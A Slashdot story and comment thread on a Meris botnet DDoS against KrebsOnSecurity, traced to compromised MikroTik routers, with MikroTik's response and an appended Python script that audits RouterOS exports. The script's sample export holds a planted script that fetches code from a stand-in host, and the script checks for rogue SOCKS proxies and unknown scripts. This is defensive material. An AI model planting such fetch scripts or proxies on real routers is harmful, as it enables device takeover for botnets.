Krebs Also Hit By Massive DDOS, Apparently Caused by Compromised Routers (krebsonsecurity.com)
"On Thursday evening, KrebsOnSecurity was the subject of a rather massive (and mercifully brief) distributed denial-of-service (DDoS) attack," the site reports.
Citing a new blog post from DDoS protection firm Qrator Labs, Krebs writes that "The assault came from 'Meris,' the same new botnet behind record-shattering attacks against Russian search giant Yandex this week and internet infrastructure firm Cloudflare earlier this summer." A titanic and ongoing DDoS that hit Russian Internet search giant Yandex last week is estimated to have been launched by roughly 250,000 malware-infected devices globally, sending 21.8 million bogus requests-per-second. While last night's Meris attack on this site was far smaller than the recent Cloudflare DDoS, it was far larger than the Mirai DDoS attack in 2016 that held KrebsOnSecurity offline for nearly four days. The traffic deluge from Thursday's attack on this site was more than four times what Mirai threw at this site five years ago. This latest attack involved more than two million requests-per-second. By comparison, the 2016 Mirai DDoS generated approximately 450,000 requests-per-second.
According to Qrator, which is working with Yandex on combating the attack, Meris appears to be made up of Internet routers produced by MikroTik. Qrator says the United States is home to the largest number of MikroTik routers that are potentially vulnerable to compromise by Meris — with more than 42 percent of the world's MikroTik systems connected to the Internet (followed by China at 18.9 percent, and a long tail of one- and two-percent countries). It's not immediately clear which security vulnerabilities led to these estimated 250,000 MikroTik routers getting hacked by Meris. "The spectrum of RouterOS versions we see across this botnet varies from years old to recent," the company wrote. "The largest share belongs to the version of firmware previous to the current stable one."
Krebs writes that the biggest contributor to the IoT botnet problem remains "a plethora of companies white-labeling [cheap] IoT devices that were never designed with security in mind and are often shipped to the customer in default-insecure states...
"The good news is that over the past five years, large Internet infrastructure companies like Akamai, Cloudflare and Google (which protects this site with its Project Shield initiative) have heavily invested in ramping up their ability to withstand these outsized attacks..."
One year earlier, back in 2015, Krebs had answered questions from Slashdot's readers.
Re: (Score:2)
Re: (Score:3)
Go take a long walk off a short pier, the world would be a better place without your brand of hate in it.
Except that then there would be a ring around the ocean.
Question (Score:4, Interesting)
Let's assume your home router has been compromised and is now part of one of these botnets. The criminals use your router as part of their DDOS. Wouldn't your ISP see the massive amount of sustained traffic pouring out of your router and block you until they figure out what you're doing?
This question presumes you're in a country which has decent providers, not some place such as India or Russia.
Re: (Score:3, Insightful)
Let's assume your home router has been compromised and is now part of one of these botnets. The criminals use your router as part of their DDOS. Wouldn't your ISP see the massive amount of sustained traffic pouring out of your router and block you until they figure out what you're doing?
Mikrotik gear is often used internally by ISPs because it is cheap and reasonably capable. Likely there is no substantial increase in bandwidth utilization locally. These are not bandwidth flood attacks; they are resource exhaustion attacks.
Re: (Score:2)
The problem is a lot of home routers are provided by the ISP - either built into the modem they give you, or as an
Dealing with this stuff properly (Score:3)
So, what is the best way to deal with security on your router/firewall box today, with the presumption that you cannot trust the vendor? Can you layer in a bridge-mode / transparent firewall, or does that actually make things less secure.
Today to have a functioning network your router just has a huge attack surface.
Re: (Score:2)
Find one you trust and then restrict access to management functions.
Close. I do trust MikroTik, as a reputable maker providing very flexible equipment. Still, nothing should be assumed to be absolutely secure nowadays.
Devices and software are extremely complicated, and usually it is a matter of time and effort to spot a vulnerability.
Since there was a gateway position to fill recently, I was reviewing MikroTik vulnerabilities known to date, and there were not many so far.
Proceeded with this maker as a solution. One thing that is not there out of the box in full fledge is rulese
Re: (Score:3)
These good firewall examples that can easily be found online that you speak of
It feels like almost all of them are completely obsolete. I was troubleshooting a VPN problem the other day which forced me to watch tcpdump for a few hours. The first scary thing is just how many trackers there are on things today and the risks they pose. Then all the other crap comes out.
Beyond stateful firewalls and blocking a handful of high-risk ports, there really aren’t a lot of current recommendations out there th
Re: (Score:2)
You could well restrict who is to be communicated with, couldn't you. Sure, the sky is the limit if you elaborate on what could be in the place of your gateway/firewall.
But this can quickly come at an expense. I have just quoted what the maintenance cost would be for keeping a smarter Checkpoint 3600 unit for my client,
and it came to an annual fee of over 3K Eur, which would be overkill for this small business. Some entities may care to spend this and even more, but not every one.
It may evolve into several directions of narrow
Re: (Score:2)
You can do that stuff with a $200-500 Ubiquiti EdgeRouter as well, blocking user X from all social media systems or whatever. The problem is these are essentially HR restrictions and not security enhancements. Inbound protection is really limited, in practical terms. It has a significant impact on productivity, usefulness, and honestly very little security benefit.
Defense in depth is the mantra but there are few good defenses for your edge firewall.
Re: (Score:2)
Can't comment on Ubiquiti units, as I do not use them, but with MikroTik you have fine enough control over your incoming traffic: you open up only what is desired to be open, you lock down whatever is left necessary to known trusted IPs, you sit behind NAT to stay on the response side rather than that of plain incoming, which you mention as a concern. Can't quite see where the essence of the fundamental problem is. My experience shows that the most challenging spot, out of our control, is the mailbox - delivering whatever to the very des
Re: (Score:1)
Those are good ideas but...
The majority of customers out there are NOT TECH SAVVY and simply want something they can "plug in and forget about" and pay someone else to install...and then forget to pay ongoing maintenance to keep it up-to-date.
Think about it this way: How many people actually change the filter in their water filter? Clean out the drip tray under their refrigerators? Change the filter in their air conditioning-heating system? Change the air and oil filters in their car, unless they go to one of
Re: (Score:2)
Sure, they will need to outsource engineers to do engineering stuff. MikroTik is for networking designs more than for consumption.
Casual consumers will hardly know the very brand and its products. You still need professionals to design a bridge, fix your teeth or provide legal services.
Nothing wrong with knowing there are limits on DIY.
Re: (Score:1)
Sure, they will need to outsource engineers to do engineering stuff. MikroTik is for networking designs more than for consumption. Casual consumers will hardly know the very brand and its products. You still need professionals to design a bridge, fix your teeth or provide legal services. Nothing wrong with knowing there are limits on DIY.
I agree with your comments. Sadly, most typical users either: (1) take it out of the box, read a page or two in the manual, then plug it in and change enough to get it working; or, (2) they pay someone to set it up but do not bother doing any ongoing maintenance like updating passwords, rules, firmware, etc. The tl;dr of the rest of this post is: Most end users make poor choices when it comes to device security and then try to blame others to hide their own shortcomings.
As some may have mentioned, some "wre
Re: (Score:2)
OK, I see you are still attempting to come at this from the consumer's point of view (how to close this emerging gap, where engineering capabilities are not even to be expected). Which is, surprisingly, correct in the long run, as many computing products are landing about there, as products for the particular consumer: like, what is your Microsoft account or Apple ID, and let's start things from there.
This does annoy folks like me, who were following the evolution of fundamental computing, much less computing as a fo
Re: (Score:1)
I have been looking at MikroTik for my home and for my employer's place.
They seem good value for money compared to other brands and have decent functionality and support.
I might still get some gear from them eventually after further research.
Not Caused by Compromised Routers (Score:3)
The router is a tool. The DDOS was caused by a person that compromised the router.
The overall cause is hackers, the vendors making crappy IOT devices and Congress. We elect Congress to legislate on just this kind of thing.
Federal law should prohibit the importation of IOT devices that can't be secured, and maybe federal law should prohibit connecting insecure IOT devices to the internet.
Re: (Score:2)
Federal law should prohibit the importation of IOT devices that can't be secured, and maybe federal law should prohibit connecting insecure IOT devices to the internet.
Your insecure computer is causing money leakage.* Disconnect!
*Piracy.
Re: (Score:2)
OK, let's create a law that prohibits the connecting of an "insecure IOT device" to the internet.
Question for 100: What is an "insecure IOT device"?
I have a hunch, given our legislators, the answer is "whoever doesn't pay enough of a kickback and/or doesn't get some governmental stamp of approval".
Careful what you wish for. Especially when it comes to laws.
Re: (Score:1)
Re: (Score:2)
I’m fine with insecure crappy IoT devices; what the ESP8266 has given us can be great. The problem is when they need to connect to the internet to function, and cannot be isolated in an IoT cage.
mikrotik response (Score:3, Informative)
QUOTE
Many of you have asked what this Meris botnet is that some news outlets are discussing right now, and if there is any new vulnerability in RouterOS.
As far as we have seen, these attacks use the same routers that were compromised in 2018, when MikroTik RouterOS had a vulnerability that was quickly patched.
Unfortunately, closing the vulnerability does not immediately protect these routers. If somebody got your password in 2018, just an upgrade will not help. You must also change the password, re-check that your firewall does not allow remote access to unknown parties, and look for scripts that you did not create.
We have tried to reach all users of RouterOS about this, but many of them have never been in contact with MikroTik and are not actively monitoring their devices. We are working on other solutions too.
As far as we know right now, there are no new vulnerabilities in these devices. RouterOS has recently been independently audited by several contractors.
If you do see a RouterOS device that has malicious scripts or SOCKS configuration that was not created by you, especially if this configuration APPEARED NOW, RECENTLY, WHILE RUNNING A NEW ROUTEROS RELEASE: Please contact us immediately.
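As an added illustration of the checks MikroTik's notice asks operators to make (this is not part of the original post and not MikroTik's own tooling), the script below parses a constructed RouterOS `/export` and flags a SOCKS proxy that is enabled, scripts or scheduler entries not on the administrator's allowlist, and management services not bound to an address. The sample export, the entry names and the allowlist are assumptions made for the example.

```python
import re
# Constructed sample of a RouterOS "/export" (not a real device dump).
SAMPLE_EXPORT = """\
/ip socks
set enabled=yes port=5678
/ip service
set winbox port=8291
set ssh address=192.168.88.0/24 port=22
/system script
add name=backup policy=read,write source="/system backup save"
add name=u113 policy=ftp,read,write source="/tool fetch url=http://placeholder.invalid/x"
/system scheduler
add interval=1d name=nightly on-event=backup
add interval=10m name=u113 on-event=u113
"""
# Names the administrator knows they created (assumed allowlist per section).
KNOWN = {"/system script": {"backup"}, "/system scheduler": {"nightly"}}
MGMT_SERVICES = {"api", "api-ssl", "ftp", "ssh", "telnet", "winbox", "www", "www-ssl"}
def parse_export(text):
    """Return {"/section": [entry, ...]}; an entry maps key -> value, plus _name for positional items."""
    sections, current = {}, None
    for line in (l.strip() for l in text.splitlines() if l.strip()):
        if line.startswith("/"):                     # section header, e.g. "/ip service"
            current, sections[line] = line, []
            continue
        verb, _, rest = line.partition(" ")          # "add key=value ..." or "set item key=value ..."
        entry = {"_verb": verb}
        pos = re.match(r'([^=\s"]+)(?:\s|$)', rest)  # positional item name, e.g. "winbox"
        if pos:
            entry["_name"] = pos.group(1)
        for key, val in re.findall(r'(\S+?)=("[^"]*"|\S+)', rest):
            entry[key] = val.strip('"')
        sections[current].append(entry)
    return sections

def audit(text):
    """Flag SOCKS enabled, scripts/schedules not on the allowlist, and management services open to any address."""
    cfg, findings = parse_export(text), []
    for e in cfg.get("/ip socks", []):
        if e.get("enabled") == "yes":
            findings.append("socks proxy enabled on port " + e.get("port", "?"))
    for section, known in KNOWN.items():
        for e in cfg.get(section, []):
            if e.get("name") not in known:
                findings.append("unknown entry in " + section + ": " + e.get("name", "?"))
    for e in cfg.get("/ip service", []):
        svc = e.get("_name")
        if svc in MGMT_SERVICES and e.get("disabled") != "yes" and "address" not in e:
            findings.append("management service " + svc + " open to any address")
    return findings
```

A plain `/export` omits settings still at their defaults, so a management service that was never touched will not appear in it; review `/ip service print` on the device as well.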
The problem is the internet (Score:2)
If internet governance actually existed and mandated ingress/egress filtering for all ISPs AND had a mechanism for pushing filter rules upstream by the owner of an IP range to ISPs of a given attacker, none of this would be a problem. The ISP of a compromised customer would get a lot of filter rules pushed on them, get pissed about it and do something about it.
Aren't most IoT devices behind a NAT? (Score:3)